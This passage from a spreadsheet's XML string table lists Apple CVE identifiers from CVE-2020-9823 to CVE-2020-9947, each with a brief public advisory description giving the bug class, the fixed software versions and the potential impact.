    <t>CVE-2020-9823</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 13.5 and iPadOS 13.5. Users removed from an iMessage conversation may still be able to alter state.</t>
  </si>
  <si>
    <t>CVE-2020-9824</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.5. A non-privileged user may be able to modify restricted network settings.</t>
  </si>
  <si>
    <t>CVE-2020-9825</t>
  </si>
  <si>
    <t>An access issue was addressed with additional sandbox restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. A malicious application may be able to bypass Privacy preferences.</t>
  </si>
  <si>
    <t>CVE-2020-9826</t>
  </si>
  <si>
    <t>A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9827</t>
  </si>
  <si>
    <t>A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9828</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.4. A remote attacker may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-9829</t>
  </si>
  <si>
    <t>A validation issue was addressed with improved input sanitization. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5. Processing a maliciously crafted text message may lead to application denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9830</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9831</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9832</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9833</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.5. A local user may be able to read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9834</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9835</t>
  </si>
  <si>
    <t>An issue existed in the pausing of FaceTime video. The issue was resolved with improved logic. This issue is fixed in iOS 13.5 and iPadOS 13.5. A user’s video may not be paused in a FaceTime call if they exit the FaceTime app while the call is ringing.</t>
  </si>
  <si>
    <t>CVE-2020-9837</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5. A remote attacker may be able to leak memory.</t>
  </si>
  <si>
    <t>CVE-2020-9838</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.5 and iPadOS 13.5. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9839</t>
  </si>
  <si>
    <t>A race condition was addressed with improved state handling. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9840</t>
  </si>
  <si>
    <t>In SwiftNIO Extras before 1.4.1, a logic issue was addressed with improved restrictions.</t>
  </si>
  <si>
    <t>CVE-2020-9841</t>
  </si>
  <si>
    <t>An integer overflow was addressed through improved input validation. This issue is fixed in macOS Catalina 10.15.5. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9842</t>
  </si>
  <si>
    <t>An entitlement parsing issue was addressed with improved parsing. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application could interact with system processes to access private information and perform privileged actions.</t>
  </si>
  <si>
    <t>CVE-2020-9843</t>
  </si>
  <si>
    <t>An input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. Processing maliciously crafted web content may lead to a cross site scripting attack.</t>
  </si>
  <si>
    <t>CVE-2020-9844</t>
  </si>
  <si>
    <t>A double free issue was addressed with improved memory management. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9847</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to break out of its sandbox.</t>
  </si>
  <si>
    <t>CVE-2020-9848</t>
  </si>
  <si>
    <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.5 and iPadOS 13.5. A person with physical access to an iOS device may be able to view notification contents from the lockscreen.</t>
  </si>
  <si>
    <t>CVE-2020-9849</t>
  </si>
  <si>
    <t>An information disclosure issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, iOS 14.0 and iPadOS 14.0, iTunes for Windows 12.10.9, iCloud for Windows 11.5, tvOS 14.0. A remote attacker may be able to leak memory.</t>
  </si>
  <si>
    <t>CVE-2020-9850</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.5 and iPadOS 13.5, tvOS 13.4.5, watchOS 6.2.5, Safari 13.1.1, iTunes 12.10.7 for Windows, iCloud for Windows 11.2, iCloud for Windows 7.19. A remote attacker may be able to cause arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9851</t>
  </si>
  <si>
    <t>An access issue was addressed with improved access restrictions. This issue is fixed in macOS Catalina 10.15.5. A malicious application may be able to modify protected parts of the file system.</t>
  </si>
  <si>
    <t>CVE-2020-9852</t>
  </si>
  <si>
    <t>An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5, watchOS 6.2.5. A malicious application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9853</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Catalina 10.15.4. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9854</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 13.5 and iPadOS 13.5, macOS Catalina 10.15.5, tvOS 13.4.5. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9855</t>
  </si>
  <si>
    <t>A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Catalina 10.15.5. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9856</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.5. An application may be able to gain elevated privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9857</t>
  </si>
  <si>
    <t>An issue existed in the parsing of URLs. This issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.5, Security Update 2020-003 Mojave, Security Update 2020-003 High Sierra. A malicious website may be able to exfiltrate autofilled data in Safari.</t>
  </si>
  <si>
    <t>CVE-2020-9858</t>
  </si>
  <si>
    <t>A dynamic library loading issue was addressed with improved path searching. This issue is fixed in Windows Migration Assistant 2.2.0.0 (v. 1A11). Running the installer in an untrusted directory may result in arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9859</t>
  </si>
  <si>
    <t>A memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.5.1 and iPadOS 13.5.1, macOS Catalina 10.15.5 Supplemental Update, tvOS 13.4.6, watchOS 6.2.6. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9860</t>
  </si>
  <si>
    <t>A custom URL scheme handling issue was addressed with improved input validation. This issue is fixed in Safari 13.0.5. Processing a maliciously crafted URL may lead to arbitrary javascript code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9861</t>
  </si>
  <si>
    <t>A stack overflow issue existed in Swift for Linux. The issue was addressed with improved input validation for dealing with deeply nested malicious JSON input.</t>
  </si>
  <si>
    <t>CVE-2020-9862</t>
  </si>
  <si>
    <t>A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection.</t>
  </si>
  <si>
    <t>CVE-2020-9863</t>
  </si>
  <si>
    <t>A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9864</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9865</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox.</t>
  </si>
  <si>
    <t>CVE-2020-9866</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. A buffer overflow may result in arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9868</t>
  </si>
  <si>
    <t>A certificate validation issue existed when processing administrator added certificates. This issue was addressed with improved certificate validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An attacker may have been able to impersonate a trusted website using shared key material for an administrator added certificate.</t>
  </si>
  <si>
    <t>CVE-2020-9869</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may cause an unexpected application termination.</t>
  </si>
  <si>
    <t>CVE-2020-9870</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-9871</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9872</t>
  </si>
  <si>
    <t>CVE-2020-9873</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9874</t>
  </si>
  <si>
    <t>CVE-2020-9875</t>
  </si>
  <si>
    <t>An integer overflow was addressed through improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9876</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9877</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9878</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9879</t>
  </si>
  <si>
    <t>CVE-2020-9880</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9881</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9882</t>
  </si>
  <si>
    <t>CVE-2020-9883</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9884</t>
  </si>
  <si>
    <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9885</t>
  </si>
  <si>
    <t>An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group.</t>
  </si>
  <si>
    <t>CVE-2020-9887</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. Viewing a maliciously crafted JPEG file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9888</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9889</t>
  </si>
  <si>
    <t>CVE-2020-9890</t>
  </si>
  <si>
    <t>CVE-2020-9891</t>
  </si>
  <si>
    <t>CVE-2020-9892</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9893</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9894</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9895</t>
  </si>
  <si>
    <t>CVE-2020-9897</t>
  </si>
  <si>
    <t>An out-of-bounds write was addressed with improved input validation. This issue is fixed in iOS 14.2 and iPadOS 14.2, macOS Big Sur 11.0.1. Processing a maliciously crafted PDF may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9898</t>
  </si>
  <si>
    <t>This issue was addressed with improved entitlements. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A sandboxed process may be able to circumvent sandbox restrictions.</t>
  </si>
  <si>
    <t>CVE-2020-9899</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9900</t>
  </si>
  <si>
    <t>An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9901</t>
  </si>
  <si>
    <t>An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A local attacker may be able to elevate their privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9902</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to determine kernel memory layout.</t>
  </si>
  <si>
    <t>CVE-2020-9903</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain.</t>
  </si>
  <si>
    <t>CVE-2020-9904</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9905</t>
  </si>
  <si>
    <t>A buffer overflow was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9906</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9907</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9908</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9909</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations.</t>
  </si>
  <si>
    <t>CVE-2020-9910</t>
  </si>
  <si>
    <t>Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.</t>
  </si>
  <si>
    <t>CVE-2020-9911</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy.</t>
  </si>
  <si>
    <t>CVE-2020-9912</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode.</t>
  </si>
  <si>
    <t>CVE-2020-9913</t>
  </si>
  <si>
    <t>This issue was addressed with improved data protection. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to leak sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-9914</t>
  </si>
  <si>
    <t>An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets.</t>
  </si>
  <si>
    <t>CVE-2020-9915</t>
  </si>
  <si>
    <t>An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.</t>
  </si>
  <si>
    <t>CVE-2020-9916</t>
  </si>
  <si>
    <t>A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL.</t>
  </si>
  <si>
    <t>CVE-2020-9917</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9918</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9919</t>
  </si>
  <si>
    <t>CVE-2020-9920</t>
  </si>
  <si>
    <t>A path handling issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, watchOS 6.2.8. A malicious mail server may overwrite arbitrary mail files.</t>
  </si>
  <si>
    <t>CVE-2020-9921</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9922</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing a maliciously crafted email may lead to writing arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-9923</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9924</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A remote attacker may be able to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-9925</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting.</t>
  </si>
  <si>
    <t>CVE-2020-9926</t>
  </si>
  <si>
    <t>A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, iCloud for Windows 7.20, macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. Processing maliciously crafted XML may lead to an unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9927</t>
  </si>
  <si>
    <t>CVE-2020-9928</t>
  </si>
  <si>
    <t>Multiple memory corruption issues were addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges.</t>
  </si>
  <si>
    <t>CVE-2020-9929</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9930</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6, Security Update 2020-004 Mojave, Security Update 2020-004 High Sierra. A local user may be able to cause unexpected system termination or read kernel memory.</t>
  </si>
  <si>
    <t>CVE-2020-9931</t>
  </si>
  <si>
    <t>A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination.</t>
  </si>
  <si>
    <t>CVE-2020-9932</t>
  </si>
  <si>
    <t>A memory corruption issue was addressed with improved validation. This issue is fixed in Safari 13.0.1, iOS 13.1 and iPadOS 13.1, tvOS 13. Processing maliciously crafted web content may lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9933</t>
  </si>
  <si>
    <t>An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information.</t>
  </si>
  <si>
    <t>CVE-2020-9934</t>
  </si>
  <si>
    <t>An issue existed in the handling of environment variables. This issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6. A local user may be able to view sensitive user information.</t>
  </si>
  <si>
    <t>CVE-2020-9935</t>
  </si>
  <si>
    <t>A logic issue was addressed with improved state management. This issue is fixed in macOS Catalina 10.15.6. A user may be unexpectedly logged in to another user’s account.</t>
  </si>
  <si>
    <t>CVE-2020-9936</t>
  </si>
  <si>
    <t>CVE-2020-9937</t>
  </si>
  <si>
    <t>CVE-2020-9938</t>
  </si>
  <si>
    <t>CVE-2020-9939</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.6. A local user may be able to load unsigned kernel extensions.</t>
  </si>
  <si>
    <t>CVE-2020-9940</t>
  </si>
  <si>
    <t>A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9941</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in macOS Catalina 10.15.7, Security Update 2020-005 High Sierra, Security Update 2020-005 Mojave. A remote attacker may be able to unexpectedly alter application state.</t>
  </si>
  <si>
    <t>CVE-2020-9942</t>
  </si>
  <si>
    <t>An inconsistent user interface issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.0.1, Safari 13.1.2. Visiting a malicious website may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-9943</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0. A malicious application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-9944</t>
  </si>
  <si>
    <t>An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.0.1, watchOS 7.0, tvOS 14.0, iOS 14.0 and iPadOS 14.0. An application may be able to read restricted memory.</t>
  </si>
  <si>
    <t>CVE-2020-9945</t>
  </si>
  <si>
    <t>A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1, Safari 14.0.1. Visiting a malicious website may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2020-9946</t>
  </si>
  <si>
    <t>This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period.</t>
  </si>
  <si>
    <t>CVE-2020-9947</t>
  </si>
  <si>
